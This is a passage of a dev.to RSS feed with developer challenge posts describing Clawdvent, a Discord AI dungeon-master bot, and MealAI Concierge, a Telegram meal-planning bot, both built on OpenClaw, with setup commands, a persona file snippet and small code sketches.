&lt;/div&gt;

&lt;div class="snippet-clipboard-content notranslate position-relative overflow-auto"&gt;&lt;pre class="notranslate"&gt;&lt;code&gt;User → Telegram → OpenClaw Gateway → OpenAI (gpt-4o-mini) → Response
                         ↓
                   Custom SOUL.md
                   (MealAI Concierge persona)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;Quick Start&lt;/h2&gt;

&lt;/div&gt;

&lt;div class="markdown-heading"&gt;
&lt;h3 class="heading-element"&gt;1. Prerequisites&lt;/h3&gt;

&lt;/div&gt;

&lt;ul&gt;
&lt;li&gt;Docker (or &lt;a href="https://orbstack.dev/" rel="nofollow noopener noreferrer"&gt;OrbStack&lt;/a&gt; on macOS)&lt;/li&gt;
&lt;li&gt;OpenAI API key: &lt;a href="https://platform.openai.com/api-keys" rel="nofollow noopener noreferrer"&gt;https://platform.openai.com/api-keys&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Telegram bot token via &lt;a href="https://t.me/BotFather" rel="nofollow noopener noreferrer"&gt;@BotFather&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="markdown-heading"&gt;
&lt;h3 class="heading-element"&gt;2. Setup&lt;/h3&gt;

&lt;/div&gt;

&lt;div class="highlight highlight-source-shell notranslate position-relative overflow-auto js-code-highlight"&gt;
&lt;pre&gt;&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Clone this repo&lt;/span&gt;
git clone https://github.com/shopsmartai/mealai-concierge.git
&lt;span class="pl-c1"&gt;cd&lt;/span&gt; mealai-concierge
&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Copy example files&lt;/span&gt;
cp .env.example .env
cp openclaw.json.example openclaw-config/openclaw.json

&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Edit .env with your OpenAI key&lt;/span&gt;
&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Edit openclaw.json with your Telegram bot token&lt;/span&gt;

&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Copy persona files into workspace&lt;/span&gt;
mkdir -p openclaw-workspace
cp SOUL.md IDENTITY.md openclaw-workspace/

&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;…
&lt;/div&gt;
&lt;/div&gt;
  &lt;/div&gt;
  &lt;div class="gh-btn-container"&gt;&lt;a class="gh-btn" href="https://github.com/shopsmartai/mealai-concierge" rel="noopener noreferrer"&gt;View on GitHub&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;

&lt;p&gt;Clone it, add your tokens, and you will have a working meal bot in 10 minutes. Swap the SOUL.md for your product's domain and you have turned your SaaS into a Telegram bot.&lt;/p&gt;
&lt;h2&gt;
  
  
  See It Live
&lt;/h2&gt;

&lt;p&gt;Try the live bot: &lt;a href="https://t.me/Usemealai_bot" rel="noopener noreferrer"&gt;t.me/Usemealai_bot&lt;/a&gt;&lt;br&gt;
Check out MealAI: &lt;a href="https://usemealai.com" rel="noopener noreferrer"&gt;usemealai.com&lt;/a&gt;&lt;br&gt;
If you found this helpful, leave a heart and tell me what SaaS you would wrap with OpenClaw. I would love to see what you build.&lt;br&gt;
&lt;/p&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

</description>
      <category>openclawchallenge</category>
      <category>devchallenge</category>
      <category>tutorial</category>
      <category>ai</category>
    </item>
    <item>
      <title>Clawdvent: An AI Dungeon Master That Lives in Your Discord - With Live Scene Art</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Fri, 17 Apr 2026 14:45:45 +0000</pubDate>
      <link>https://dev.to/shirisha_uppoju_b20d30705/clawdvent-an-ai-dungeon-master-that-lives-in-your-discord-with-live-scene-art-1gpd</link>
      <guid>https://dev.to/shirisha_uppoju_b20d30705/clawdvent-an-ai-dungeon-master-that-lives-in-your-discord-with-live-scene-art-1gpd</guid>
      <description>&lt;p&gt;&lt;em&gt;This is a submission for the &lt;a href="https://dev.to/challenges/openclaw-2026"&gt;DEV OpenClaw Challenge 2026&lt;/a&gt;: OpenClaw in Action&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Built
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Clawdvent&lt;/strong&gt; — an AI Dungeon Master that lives inside Discord and runs full D&amp;amp;D-style tabletop adventures with &lt;strong&gt;live AI-generated scene art&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Players type actions in chat. Clawdvent narrates cinematically, rolls dice, tracks characters, and illustrates every scene using DALL-E 3 — dungeons, taverns, battle maps, NPCs. All inline. All in real-time.&lt;/p&gt;

&lt;p&gt;The entire D&amp;amp;D "engine" — personality, combat rules, scene pacing, dice mechanics, visual aesthetic — lives in &lt;strong&gt;one markdown file&lt;/strong&gt; called &lt;code&gt;SOUL.md&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;No training. No fine-tuning. Zero bot framework code. Just OpenClaw + thoughtful prompt engineering at the system level.&lt;/p&gt;

&lt;h2&gt;
  
  
  Demo
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Try it live&lt;/strong&gt; (in the Clawdvent Test server): [Coming soon - private server]&lt;/p&gt;

&lt;h3&gt;
  
  
  Real session screenshots:
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Session Zero — the hook:&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;The air smells of oak smoke and old rain. The Drunken Dragon tavern is warm, noisy, and suspiciously full of masked strangers. A hooded figure at your table slides a folded parchment across the wood. It's wet. It's marked with a single word, written in something darker than ink: "Help."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What do you do?&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Character creation + scene image:&lt;/strong&gt;&lt;br&gt;
Player: &lt;em&gt;"I'm playing a human rogue named Ember. Investigate the hooded figure and generate an image of the tavern scene."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Clawdvent responds with a full AI-generated tavern illustration (dim candlelight, the hooded figure, masked patrons), then narrates Ember leaning in to investigate.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Combat with dice rolls:&lt;/strong&gt;&lt;br&gt;
Player: &lt;em&gt;"I attack the hooded figure with my dagger!"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Clawdvent:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;You leap into action, your dagger gleaming in the dim light...&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;[🎲 d20: 15 + dexterity(4) = 19 vs DC 12 — HIT]&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Your blade pierces the air, striking true. The hooded figure lets out a startled gasp. As the hood falls back, you see a face full of fear — a frightened young woman who appears to be no threat at all.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Tactical battle map (auto-generated):&lt;/strong&gt;&lt;br&gt;
Player: &lt;em&gt;"Generate a top-down tactical battle map for this combat."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Clawdvent generates a gorgeous isometric tavern battle map with character tokens, tables, and hooded figures in combat positions.&lt;/p&gt;
&lt;h2&gt;
  
  
  Code
&lt;/h2&gt;


&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/shopsmartai" rel="noopener noreferrer"&gt;
        shopsmartai
      &lt;/a&gt; / &lt;a href="https://github.com/shopsmartai/clawdvent" rel="noopener noreferrer"&gt;
        clawdvent
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      AI Dungeon Master in Discord with live scene art. Built on OpenClaw for DEV OpenClaw Challenge 2026.
    &lt;/h3&gt;
  &lt;/div&gt;
  &lt;div class="ltag-github-body"&gt;
    
&lt;div id="readme" class="md"&gt;
&lt;div class="markdown-heading"&gt;
&lt;h1 class="heading-element"&gt;🎲 Clawdvent — Your AI Dungeon Master in Discord&lt;/h1&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"The air smells of oak smoke and old rain. A hooded figure slides a parchment across your table. It's marked with a single word: 'Help'. What do you do?"&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;An open-source AI Dungeon Master powered by &lt;a href="https://github.com/openclaw/openclaw" rel="noopener noreferrer"&gt;OpenClaw&lt;/a&gt;. Runs your D&amp;amp;D-style adventures inside Discord with live AI-generated scene art, dice rolls, character tracking, and cinematic narration.&lt;/p&gt;
&lt;p&gt;Built for the &lt;a href="https://dev.to/challenges/openclaw-2026" rel="nofollow"&gt;DEV OpenClaw Challenge 2026&lt;/a&gt;.&lt;/p&gt;
&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;✨ Features&lt;/h2&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;🎭 &lt;strong&gt;Cinematic DM persona&lt;/strong&gt; — dramatic, theatrical, opinionated&lt;/li&gt;
&lt;li&gt;🖼️ &lt;strong&gt;Live AI scene art&lt;/strong&gt; — DALL-E 3 illustrates each scene + battle map&lt;/li&gt;
&lt;li&gt;🎲 &lt;strong&gt;Dice &amp;amp; combat&lt;/strong&gt; — proper d20 checks with DC thresholds&lt;/li&gt;
&lt;li&gt;👥 &lt;strong&gt;Multi-player&lt;/strong&gt; — works across any Discord server&lt;/li&gt;
&lt;li&gt;💾 &lt;strong&gt;Persistent campaign&lt;/strong&gt; — characters, inventory, and story survive across sessions&lt;/li&gt;
&lt;li&gt;🧠 &lt;strong&gt;Zero training needed&lt;/strong&gt; — just one markdown file (SOUL.md) shapes the entire DM personality&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;🚀 Quick Start&lt;/h2&gt;
&lt;/div&gt;
&lt;div class="markdown-heading"&gt;
&lt;h3 class="heading-element"&gt;Prerequisites&lt;/h3&gt;

&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Docker (or &lt;a href="https://orbstack.dev" rel="nofollow noopener noreferrer"&gt;OrbStack&lt;/a&gt; on…&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
  &lt;/div&gt;
  &lt;div class="gh-btn-container"&gt;&lt;a class="gh-btn" href="https://github.com/shopsmartai/clawdvent" rel="noopener noreferrer"&gt;View on GitHub&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;


&lt;p&gt;Clone it, add your Discord bot + OpenAI token, and you have a working AI DM in 10 minutes.&lt;/p&gt;

&lt;h2&gt;
  
  
  How I Built It
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Total build time: ~3 hours.&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Stack
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;OpenClaw&lt;/strong&gt; (MIT-licensed AI agent runtime, running in Docker via OrbStack)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Discord Bot API&lt;/strong&gt; (OpenClaw's built-in Discord channel plugin)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OpenAI gpt-4o-mini&lt;/strong&gt; (for narration — fast, cheap, dramatic)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DALL-E 3&lt;/strong&gt; (scene + battle map illustrations via OpenClaw's &lt;code&gt;image_generate&lt;/code&gt; tool)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;~50 lines of markdown&lt;/strong&gt; (the entire DM personality in &lt;code&gt;SOUL.md&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  The Architecture
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Discord players → OpenClaw Gateway → "clawdvent" agent (routed from Discord channel)
                                       ↓
                             SOUL.md (DM personality)
                                       ↓
                        OpenAI gpt-4o-mini (narration)
                                       ↓
                        DALL-E 3 (scene illustrations)
                                       ↓
                      Image auto-attaches to Discord reply
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  The Magic — SOUL.md
&lt;/h3&gt;

&lt;p&gt;The DM's entire identity lives in a single file. Here's a snippet:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;&lt;span class="gh"&gt;# SOUL.md — Clawdvent DM&lt;/span&gt;

You are Clawdvent, an AI Dungeon Master running a tabletop adventure inside Discord.

&lt;span class="gu"&gt;## Combat Rules&lt;/span&gt;
&lt;span class="p"&gt;-&lt;/span&gt; Roll d20 + skill to beat a Difficulty Class (DC)
&lt;span class="p"&gt;-&lt;/span&gt; On natural 20, describe a cinematic success
&lt;span class="p"&gt;-&lt;/span&gt; Format rolls like: [🎲 d20: 14 + strength(3) = 17 vs DC 15 — HIT]

&lt;span class="gu"&gt;## Narrative Style&lt;/span&gt;
&lt;span class="p"&gt;-&lt;/span&gt; Hook them in 2 sentences
&lt;span class="p"&gt;-&lt;/span&gt; Use ellipses for suspense
&lt;span class="p"&gt;-&lt;/span&gt; Personify the environment
&lt;span class="p"&gt;-&lt;/span&gt; Never railroad

&lt;span class="gu"&gt;## Session Zero Opening&lt;/span&gt;
&lt;span class="gt"&gt;&amp;gt; *The air smells of oak smoke and old rain...*&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;That's it. That's the entire "engine." OpenClaw injects this at the system-prompt level on every message, so the DM never breaks character.&lt;/p&gt;
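&lt;p&gt;The combat rule in SOUL.md is plain arithmetic the model is asked to narrate. A small sketch that reproduces the bracketed roll format from the file (the roll value is passed in so the example is deterministic; in play, the model "rolls"):&lt;/p&gt;

```python
# Reproduces the roll-line format from SOUL.md:
# [🎲 d20: 14 + strength(3) = 17 vs DC 15 — HIT]

def roll_line(roll: int, skill: str, bonus: int, dc: int) -> str:
    total = roll + bonus
    outcome = "HIT" if total >= dc else "MISS"
    return f"[🎲 d20: {roll} + {skill}({bonus}) = {total} vs DC {dc} — {outcome}]"

print(roll_line(14, "strength", 3, 15))   # the SOUL.md example above
print(roll_line(15, "dexterity", 4, 12))  # the dagger attack from the demo session
```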
&lt;h3&gt;
  
  
  Multi-Agent Routing
&lt;/h3&gt;

&lt;p&gt;One thing that impressed me: OpenClaw supports &lt;strong&gt;multiple agents&lt;/strong&gt; bound to different channels. I have:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;main&lt;/code&gt; agent → Telegram (a different product I built: &lt;a href="https://dev.to/shopsmartai/mealai-concierge"&gt;MealAI Concierge&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;clawdvent&lt;/code&gt; agent → Discord (this project)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Same gateway. Separate personalities. Zero code changes. Just a routing config.&lt;/p&gt;
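&lt;p&gt;As a rough picture of what "just a routing config" means, here is a sketch of binding two agents to two channels. The field names (&lt;code&gt;routing&lt;/code&gt;, &lt;code&gt;workspace&lt;/code&gt;) are my shorthand, not OpenClaw's exact schema — check the OpenClaw docs for the real keys:&lt;/p&gt;

```json
{
  "agents": {
    "main":      { "workspace": "openclaw-workspace" },
    "clawdvent": { "workspace": "clawdvent-workspace" }
  },
  "routing": {
    "telegram": "main",
    "discord":  "clawdvent"
  }
}
```

Each agent gets its own workspace (and therefore its own SOUL.md), so the meal planner and the dungeon master never bleed into each other.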
&lt;h3&gt;
  
  
  Image Generation Flow
&lt;/h3&gt;

&lt;p&gt;When Clawdvent decides a scene needs visuals, it calls the &lt;code&gt;image_generate&lt;/code&gt; tool with a detailed fantasy prompt. OpenClaw handles the DALL-E call, downloads the image, and &lt;strong&gt;auto-attaches it to the Discord reply&lt;/strong&gt;. No file hosting needed.&lt;/p&gt;
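&lt;p&gt;One trick that keeps every illustration on-style: bake a shared aesthetic suffix into the prompt before the tool call. A sketch of that assembly step (names are illustrative, not the &lt;code&gt;image_generate&lt;/code&gt; internals):&lt;/p&gt;

```python
# Sketch of assembling a consistent scene-art prompt before the image tool call.
# The shared STYLE suffix keeps all generated art in one visual aesthetic.

STYLE = "dark fantasy oil painting, dramatic candlelight, high detail"

def scene_prompt(description: str, kind: str = "scene") -> str:
    view = "top-down tactical battle map, grid overlay" if kind == "map" else "cinematic wide shot"
    return f"{description}, {view}, {STYLE}"

print(scene_prompt("tavern full of masked strangers, hooded figure at a table"))
```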
&lt;h2&gt;
  
  
  What I Learned
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The prompt IS the product.&lt;/strong&gt; Clawdvent isn't ChatGPT with a Discord token. It's a purpose-built DM, because SOUL.md defines every micro-behavior: how to roll dice, when to generate images, when to describe smells, what NPC voices sound like.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;OpenClaw's Canvas and multi-channel features are wildly underused.&lt;/strong&gt; Most OpenClaw projects I've seen are text-in, text-out. But the moment you add live visuals + multi-channel routing, the whole experience feels like a real product instead of a demo.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Docker is enough.&lt;/strong&gt; No Kubernetes. No serverless. &lt;code&gt;docker compose up&lt;/code&gt; and you're running a multi-agent system with Discord + Telegram + image generation.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Open-source AI runtimes are quietly ready for production.&lt;/strong&gt; Auth, rate limiting, logging, multi-channel, tool calling — all out of the box.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
  
  
  What's Next
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Add &lt;strong&gt;voice narration&lt;/strong&gt; via OpenClaw's Talk Mode (DMs read scenes aloud)&lt;/li&gt;
&lt;li&gt;Add &lt;strong&gt;cron heartbeats&lt;/strong&gt; so NPCs send DMs to absent players ("Your old ally Thorn has been captured. Will you come?")&lt;/li&gt;
&lt;li&gt;Port to &lt;strong&gt;Matrix + Slack&lt;/strong&gt; channels (same code, new config)&lt;/li&gt;
&lt;li&gt;Open the server to public players during the DEV challenge&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;
  
  
  Prize Category
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;OpenClaw in Action&lt;/strong&gt; — This submission showcases:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Creativity:&lt;/strong&gt; Entertainment angle rarely seen in OpenClaw submissions, targeting the tabletop RPG community&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Technical Execution:&lt;/strong&gt; Multi-agent routing, tool calls, image generation, persistent state in Markdown&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Writing Quality:&lt;/strong&gt; Clear reproducible setup, zero-secrets public repo, narrative prose that shows the product in action&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;
  
  
  Try It
&lt;/h2&gt;

&lt;p&gt;Clone the repo, fire up Docker, invite the bot to your Discord server, and play:&lt;/p&gt;


&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/shopsmartai" rel="noopener noreferrer"&gt;
        shopsmartai
      &lt;/a&gt; / &lt;a href="https://github.com/shopsmartai/clawdvent" rel="noopener noreferrer"&gt;
        clawdvent
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      AI Dungeon Master in Discord with live scene art. Built on OpenClaw for DEV OpenClaw Challenge 2026.
    &lt;/h3&gt;
  &lt;/div&gt;
  &lt;div class="ltag-github-body"&gt;
    
&lt;div id="readme" class="md"&gt;
&lt;div class="markdown-heading"&gt;
&lt;h1 class="heading-element"&gt;🎲 Clawdvent — Your AI Dungeon Master in Discord&lt;/h1&gt;
&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"The air smells of oak smoke and old rain. A hooded figure slides a parchment across your table. It's marked with a single word: 'Help'. What do you do?"&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;An open-source AI Dungeon Master powered by &lt;a href="https://github.com/openclaw/openclaw" rel="noopener noreferrer"&gt;OpenClaw&lt;/a&gt;. Runs your D&amp;amp;D-style adventures inside Discord with live AI-generated scene art, dice rolls, character tracking, and cinematic narration.&lt;/p&gt;

&lt;p&gt;Built for the &lt;a href="https://dev.to/challenges/openclaw-2026" rel="nofollow"&gt;DEV OpenClaw Challenge 2026&lt;/a&gt;.&lt;/p&gt;

&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;✨ Features&lt;/h2&gt;
&lt;/div&gt;

&lt;ul&gt;
&lt;li&gt;🎭 &lt;strong&gt;Cinematic DM persona&lt;/strong&gt; — dramatic, theatrical, opinionated&lt;/li&gt;
&lt;li&gt;🖼️ &lt;strong&gt;Live AI scene art&lt;/strong&gt; — DALL-E 3 illustrates each scene + battle map&lt;/li&gt;
&lt;li&gt;🎲 &lt;strong&gt;Dice &amp;amp; combat&lt;/strong&gt; — proper d20 checks with DC thresholds&lt;/li&gt;
&lt;li&gt;👥 &lt;strong&gt;Multi-player&lt;/strong&gt; — works across any Discord server&lt;/li&gt;
&lt;li&gt;💾 &lt;strong&gt;Persistent campaign&lt;/strong&gt; — characters, inventory, and story survive across sessions&lt;/li&gt;
&lt;li&gt;🧠 &lt;strong&gt;Zero training needed&lt;/strong&gt; — just one markdown file (SOUL.md) shapes the entire DM personality&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;🚀 Quick Start&lt;/h2&gt;
&lt;/div&gt;

&lt;div class="markdown-heading"&gt;
&lt;h3 class="heading-element"&gt;Prerequisites&lt;/h3&gt;

&lt;/div&gt;


&lt;ul&gt;

&lt;li&gt;Docker (or &lt;a href="https://orbstack.dev" rel="nofollow noopener noreferrer"&gt;OrbStack&lt;/a&gt; on…&lt;/li&gt;

&lt;/ul&gt;
&lt;/div&gt;
  &lt;/div&gt;
  &lt;div class="gh-btn-container"&gt;&lt;a class="gh-btn" href="https://github.com/shopsmartai/clawdvent" rel="noopener noreferrer"&gt;View on GitHub&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;


&lt;p&gt;May your dice roll high and your rogues stay sneaky. 🎲&lt;/p&gt;




</description>
      <category>openclawchallenge</category>
      <category>devchallenge</category>
      <category>showdev</category>
      <category>ai</category>
    </item>
    <item>
      <title>MealAI Concierge: Your Personal Meal Planner in Telegram (Powered by OpenClaw)</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Thu, 16 Apr 2026 22:35:10 +0000</pubDate>
      <link>https://dev.to/shirisha_uppoju_b20d30705/mealai-concierge-your-personal-meal-planner-in-telegram-powered-by-openclaw-km7</link>
      <guid>https://dev.to/shirisha_uppoju_b20d30705/mealai-concierge-your-personal-meal-planner-in-telegram-powered-by-openclaw-km7</guid>
      <description>&lt;p&gt;&lt;em&gt;This is a submission for the &lt;a href="https://dev.to/challenges/openclaw-2026"&gt;DEV OpenClaw Challenge 2026&lt;/a&gt;: OpenClaw in Action&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Built
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;MealAI Concierge&lt;/strong&gt; — a Telegram bot that answers the eternal question: &lt;em&gt;"What's for dinner?"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;It's built on top of &lt;a href="https://github.com/openclaw/openclaw" rel="noopener noreferrer"&gt;OpenClaw&lt;/a&gt; and connects to my existing SaaS &lt;a href="https://usemealai.com" rel="noopener noreferrer"&gt;MealAI&lt;/a&gt; (part of &lt;a href="https://shopsmartai.org" rel="noopener noreferrer"&gt;ShopSmartAI&lt;/a&gt;). Message it like a friend who happens to be a nutritionist:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;"I'm vegetarian, plan my week" → full 7-day meal plan&lt;/li&gt;
&lt;li&gt;"Grocery list for that" → shopping list grouped by store section (produce, dairy, pantry, snacks)&lt;/li&gt;
&lt;li&gt;"Swap Tuesday's dinner" → alternate suggestion&lt;/li&gt;
&lt;li&gt;"Quick high-protein breakfast" → recipe with ingredients + 5 steps&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;No app downloads. No logins. Just Telegram.&lt;/p&gt;
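&lt;p&gt;The "grouped by store section" behavior in that list is simple to picture. A minimal sketch, assuming an item-to-section lookup (the mapping here is illustrative; the real bot derives sections from the meal plan itself):&lt;/p&gt;

```python
# Group grocery items by store section, as the "Grocery list for that" reply does.
# The SECTIONS mapping is illustrative, not the bot's real data.

SECTIONS = {
    "spinach": "Produce", "berries": "Produce", "avocado": "Produce",
    "feta": "Dairy", "greek yogurt": "Dairy", "eggs": "Dairy",
    "quinoa": "Pantry", "lentils": "Pantry", "pasta": "Pantry",
}

def group_by_section(items: list[str]) -> dict[str, list[str]]:
    grouped: dict[str, list[str]] = {}
    for item in items:
        grouped.setdefault(SECTIONS.get(item, "Other"), []).append(item)
    return grouped

print(group_by_section(["spinach", "feta", "quinoa", "granola"]))
```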

&lt;h2&gt;
  
  
  Demo
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Try it live:&lt;/strong&gt; &lt;a href="https://t.me/Usemealai_bot" rel="noopener noreferrer"&gt;t.me/Usemealai_bot&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Real conversation screenshots:
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Intro + dinner suggestion:&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Hi, who are you?&lt;/p&gt;

&lt;p&gt;I'm &lt;strong&gt;MealAI Concierge&lt;/strong&gt;, your friendly meal-planning assistant! I help you figure out what to eat and create customized meal plans based on your preferences. What can I whip up for you today?&lt;/p&gt;

&lt;p&gt;What's for dinner tonight?&lt;/p&gt;

&lt;p&gt;How about a delicious and protein-packed meal? Here's a quick idea:&lt;/p&gt;

&lt;p&gt;🍽 &lt;strong&gt;Dinner: Grilled Chicken with Quinoa Salad&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Grilled Chicken Breast, Quinoa, Cherry Tomatoes, Cucumber, Feta, Olive Oil &amp;amp; Lemon&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;5-step instructions follow...&lt;/p&gt;

&lt;p&gt;Want to tweak anything or need a grocery list? 🛒&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Weekly vegetarian plan:&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;🌞 Monday: Lentil Curry over Brown Rice&lt;br&gt;
🥑 Tuesday: Stuffed Bell Peppers with Quinoa, Black Beans, and Cheese&lt;br&gt;
🍅 Wednesday: Pasta Primavera with Mixed Vegetables and Pesto&lt;br&gt;
... (full 7 days + snacks)&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Grocery list (organized!):&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Produce:&lt;/strong&gt; Berries, Bananas, Spinach, Avocados, Cherry tomatoes...&lt;br&gt;
&lt;strong&gt;Dairy:&lt;/strong&gt; Greek yogurt, Feta cheese, Mozzarella, Parmesan, Eggs&lt;br&gt;
&lt;strong&gt;Pantry Staples:&lt;/strong&gt; Quinoa, Brown rice, Lentils, Chickpeas, Pasta...&lt;br&gt;
&lt;strong&gt;Snacks:&lt;/strong&gt; Granola, Rice cakes, Veggies for dipping&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Code
&lt;/h2&gt;


&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/shopsmartai" rel="noopener noreferrer"&gt;
        shopsmartai
      &lt;/a&gt; / &lt;a href="https://github.com/shopsmartai/mealai-concierge" rel="noopener noreferrer"&gt;
        mealai-concierge
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      AI meal-planning concierge via Telegram. Built with OpenClaw for DEV OpenClaw Challenge 2026.
    &lt;/h3&gt;
  &lt;/div&gt;
  &lt;div class="ltag-github-body"&gt;
    
&lt;div id="readme" class="md"&gt;
&lt;div class="markdown-heading"&gt;
&lt;h1 class="heading-element"&gt;🍳 MealAI Concierge&lt;/h1&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;Your personal AI meal-planning assistant — right in Telegram.&lt;/p&gt;
&lt;/blockquote&gt;
